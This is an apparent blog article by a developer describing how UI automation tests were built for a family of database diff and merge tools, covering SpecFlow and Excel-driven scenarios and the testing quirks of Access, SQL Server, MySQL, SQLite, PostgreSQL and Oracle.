The project is a number of diff and merge tools for popular relational DBMSs. Initially created for internal use in Access development, it was primarily used to compare module and form code between different versions of the same Access project. Later, a fork was made for SQL Server, using the same UI to compare schema, data, and programming stuff. Further forks were developed for MySQL, SQLite, and PostgreSQL. With tools for working with metadata from different DBMSs, a tool was created for Cross-DBMS scenarios, focusing mainly on data. Having created a tool for Cross-DBMS, I realized that it sorely lacks Oracle support. Thus, for Cross-DBMS a kernel for working with Oracle was implemented, along with a separate tool for Oracle Database.
All tools are made using Visual Studio Community Edition and utilize the .NET Framework and WPF.
## About the tests
After one of the disastrous releases, where changes in one area unexpectedly broke another, it became clear that UI automation tests were necessary. Although there were unit tests for some components, they did not check the functionality of the entire application. Manually testing all the functionality of each release would be too time-consuming, and besides, humans (at least I) are lazy and can make mistakes. If it can be automated, then it should be automated. The first tests were built using the [TestStack.White](https://github.com/TestStack/White) library. Now that this library is no longer supported, a gradual migration to the [FlaUI](https://github.com/FlaUI/FlaUI) library is underway.
It was decided to use the [SpecFlow](https://specflow.org/) BDD framework, which conveniently describes the steps for using the application and the expected results. A typical test looks like this:
```
Scenario: 01 Sample data diff test
Given [System] Set template folder to '04_DataDiff'
And [App] Start with 'dd1;dd2' loaded
When [HomeTab] Click on the 'left' panel summary 'Total' for 'Table definitions'
And [ObjectList] On the 'left' panel click on 'Compare data (all records)' for 'Client'
Then [DataDiff] 'right' panel totals is '2;0;1;1', per page '2;0;1;1'
```
For each step, code is written that uses the UI automation library to check and manipulate the UI. However, over time, there was a complication with parameterized tests, where the same steps needed to be used for different cases. SpecFlow allows describing parameterized tests using Scenario Outline, where each case is described by a single row in the Examples table. Thus, for one case, we can provide only a set of scalar values. However, this was insufficient to describe the expected result of a complex UI consisting of multiple grids, each needing to be described by a separate table. For such tests, another approach was developed: each case is described by a row in an Excel table, with columns describing the actions and the expected UI state. Since an Excel cell can contain multiline text, a special syntax was adopted to describe multiple UI grids in one cell, for example:
```
[Columns (Name; Nullability)]
- id; NOT NULL
- name; NULL
[Constraints (Type; Columns)]
- PRIMARY KEY; id
```
From a one-dimensional list of parameters in SpecFlow, we moved to a four-dimensional set of parameters: a set of Excel cells, each containing a set of tables, with each table being a set of rows and columns. Using Excel or its alternatives is convenient as there are ready-to-use tools for viewing and editing. But there are significant drawbacks associated with the xlsx file format, such as difficulty tracking test history, comparing them, and understanding the volume of existing tests. Therefore, in the future, these scenarios are planned to be moved from Excel to some text format, most likely XML, requiring the development of a UI for editing these scenarios.
A typical test proceeds as follows:
1. Prepare one or two database instances. Only one instance is used if the test checks the application's behavior when only one database is opened, or when the same database is compared to itself. In most cases, databases are described as scripts. For tests described using Excel, the script is assembled from spreadsheet content on the fly. For applications working with Access or SQLite, ready-made DB files are sometimes used instead of scripts. Specifically for Access, not all database objects can be created with an SQL script, even when only dealing with tables. For SQLite, ready-made files are used to perform a more complete end-to-end testing cycle, which is particularly important for protected files.
Where possible:
- Databases are created in parallel to speed up the process.
- Database files are created on a RAM Drive, sometimes with the entire database server placed there. Using a RAM Drive not only speeds up test execution but also prolongs the life of SSDs or HDDs.
2. The application is launched and opens the databases. If possible, and if not crucial for the test, specifying the database is done via the command line to save time clicking through database open dialogs.
3. The test clicks through the application and checks UI elements according to the scenario steps. When the application generates and executes SQL scripts, the text of these scripts is extracted and goes to the output of the test execution console. This often helps in understanding the problem without debugging the test.
4. If the test fails, a screenshot of the application is saved.
5. The application is closed, and the databases are deleted. In most cases, database deletion occurs in the background, saving some time. Deletion is controlled by a switch; sometimes databases are retained for further analysis and debugging. Tests for AccdbMerge also check for any unclosed Access processes, which are used by the application to process database files.
Steps 1 and 2 can take significant time. Creating one database with two tables for two different cases and launching the application once can be significantly faster than creating a database with one table twice and launching the application twice (once for each database). Therefore, some cases are combined, if possible, so that one database is created for all cases, and the application is launched only once.
## DBMS-specific things
All of the listed relational DBMSs deal with tables; tables consist of columns and rows. SQL is everywhere. It would seem that I can easily take some existing test from one application and use it for another. Fortunately, sometimes this is almost possible. If a new feature is being developed, which is subsequently planned to be implemented in tools for different DBMSs, then the test for it is usually written first for SQLite, since these tests are the fastest. Often such a test and scripts for it can be reused for other products with minimal changes. But, as we know, the devil is in the details. Different data types, different database management capabilities, different SQL. As a result, the tests still have significant differences. Let's talk about them. The following will list the features for each DBMS separately, in the order these tests were created.
## Microsoft Access
Possibly the biggest issue for my tests is the limited SQL in Access, both for DDL and DML. Access has Queries similar to Views in other DBMS, and there is a CREATE VIEW statement described in the documentation, but [it does not work](https://stackoverflow.com/questions/11367959/create-view-in-ms-access-2007). There are many data types that cannot be used either in CREATE TABLE or INSERT. As a result, using a script, you can create a database file with tables using simple data types like numbers or strings. But for something more complex, pre-prepared mdb and accdb files often have to be used. However, even if we have prepared database templates, sometimes simply copying them is not enough. A common practice in Access development is to split the database into a backend and frontend, resulting in linked tables in the frontend that need to update their links to the backend after copying.
Another problem with interacting with Access is that it updates from time to time, causing some tests to stop working. My application stops working even though nothing has changed in it — only Access has changed. They have [broken](https://techcommunity.microsoft.com/t5/access-blog/breaking-ace-out-of-the-bubble/bc-p/2606712/highlight/true#M213) [twice](https://techcommunity.microsoft.com/t5/access-blog/breaking-ace-out-of-the-bubble/bc-p/3641817/highlight/true#M289) the availability of DAO libraries from the outside.
The most frequent support request I receive is that AccdbMerge cannot connect to Access, which is always fixed only by restoring Office, without changing anything in AccdbMerge.
## SQL Server
I started my programming career in the early 2000s, and SQL Server was the first database engine I worked with. So, SQL Server is a sort of standard DBMS for me, and for a long time, all other DBMSs were learned through comparison with SQL Server.
Perhaps the most interesting result of making tests for SQL Server was some incompatibility with .NET data types:
- The SQL Server **decimal** data type can exceed the capacity of the .NET **decimal** data type
- The SQL Server **uniqueidentifier** and the .NET **Guid** [have different internal presentation and sorting rules](https://learn.microsoft.com/en-us/dotnet/framework/data/adonet/sql/comparing-guid-and-uniqueidentifier-values).
## MySQL and MariaDB
The main problem for me during my work on these tools was the frequency of new releases of these DBMSs, each new release needs to be checked for compatibility with the application. At first, this mostly concerned MariaDB; MySQL stayed on version 8.0 for a long time. However, it recently released versions 8.1 to 8.4 within a short interval.
From my experience working with different DBMSs, MySQL ranks second after Access in terms of the number of bugs. And sometimes they don't get fixed for years. One example, which in particular is one of the reasons for the differences between tests, is non-working inline foreign keys. There are a lot of questions on this topic on StackOverflow and [one of them](https://stackoverflow.com/questions/24313143/mysql-how-to-declare-foreign-key-inline) contains links to a bunch of related bugs in MySQL.
## SQLite
SQLite has several specific features, but the most distinctive for my tools and their tests is its handling of data types. Not only can a column's type simply be missing, but even when types are specified, by default you can easily store a value of a different data type. Fortunately, version 3.37.0 introduced the concept of STRICT tables to fix this, but it does not eliminate the need to maintain regular tables.
The [compatibility](https://www.sqlite.org/formatchng.html) between database files and library versions is admirable. However, knowing about this super-compatibility, it was doubly strange to face [the end of support](https://sqlite.org/forum/forumpost/d2c637bafbbff69d) for one of the methods for protecting database files.
## PostgreSQL
Similar to SQL Server, I did not have any significant issues with PostgreSQL. The main difficulty from a development point of view was the huge number of data types and a wide variety of types of database objects and their properties. And it was new to me to encounter NaN and +/- infinity values for some numeric and timestamp data types.
## Oracle
As mentioned earlier, before running the test, we must first create a database. For SQL Server, MySQL, and PostgreSQL, this is simply done by sending the CREATE DATABASE command to the database server. But not for Oracle. It doesn't work there. You have the database server - and that's your database. And don't ask for another one. Instead of a database, I had to create a user, which comes with a new schema. The test then interacts with objects within this schema. Since the schema name is displayed in the application as part of the table name, and this schema is different each time, special variables had to be introduced and processed. For other DBMS tests, the table is referred to as TableName or dbo.TableName or public.TableName, and this is the real name of the object. But for Oracle tests, I had to write $schema.TABLENAME and then, in the code, replace $schema with the real schema name before looking for the object in the application UI. At first, I thought that maybe I just didn’t know something about Oracle, but then I came across the source code of one of the DB Fiddles - its authors did the same thing.
Another feature of Oracle is that an empty string is always treated as NULL. Unlike any other DBMS, it is impossible to save an empty string as non-NULL.
I use Windows, and all my desktop apps work only on Windows. Another feature of working with Oracle was the need to use Docker Desktop since I could not find a Windows version for the latest versions of Oracle.
## Other
In addition to the listed differences, there are several more points that are specific to each DBMS:
1. Case-sensitivity and quoted identifiers work differently for object names. Some DBMSs will leave the CamelCase object name as is, others will convert it to lowercase, and others to uppercase. For some DBMSs, CamelCase can be preserved if you surround the name with double quotes, but double quotes are not used by all DBMSs. MySQL and MariaDB use grave accents (`), and SQL Server (by default) and Access use square brackets ([]).
2. Creating database objects takes time, and sometimes it can be sped up if you wrap all statements in a transaction. However, not every DBMS supports transactions for DDL statements. Additionally, some DDL commands sometimes cannot be used together with others and must be sent to the DBMS server as a separate request.
3. When filling tables with data, it is convenient to use multi-row INSERT statements like this:
```
INSERT INTO TableName
(ID, Name)
VALUES
(1, 'Smith'),
(2, 'Doe')
```
But this syntax is not supported by all DBMSs, or some DBMSs may not support it for all versions. In order for the test to work on all the required DBMS versions, we have to split the script into separate INSERTs.
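On engines or versions without multi-row VALUES support, the same data load has to be issued as separate statements:

```
INSERT INTO TableName (ID, Name) VALUES (1, 'Smith');
INSERT INTO TableName (ID, Name) VALUES (2, 'Doe');
```

This form is slower but works everywhere, which is what matters for tests that must run against every supported DBMS version.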
## Summary
In this article, we discussed the practical experience of building a UI automation testing system for desktop applications that interact with various relational DBMSs. The necessity of automated UI testing became evident after a release highlighted the risks of manual testing. Each DBMS presented unique challenges, from Access's limited SQL capabilities and frequent updates to Oracle's unconventional database creation requirements. The experience highlighted the importance of flexibility and adaptability in automated testing to accommodate the nuances of different DBMSs.
## P. S.
According to the publishing rules, I have to note that I have used AI for title, summary and proofreading of the rest of the text. But the text itself was handwritten, including the SQL for the cover image :).
| konstantin_semenenkov |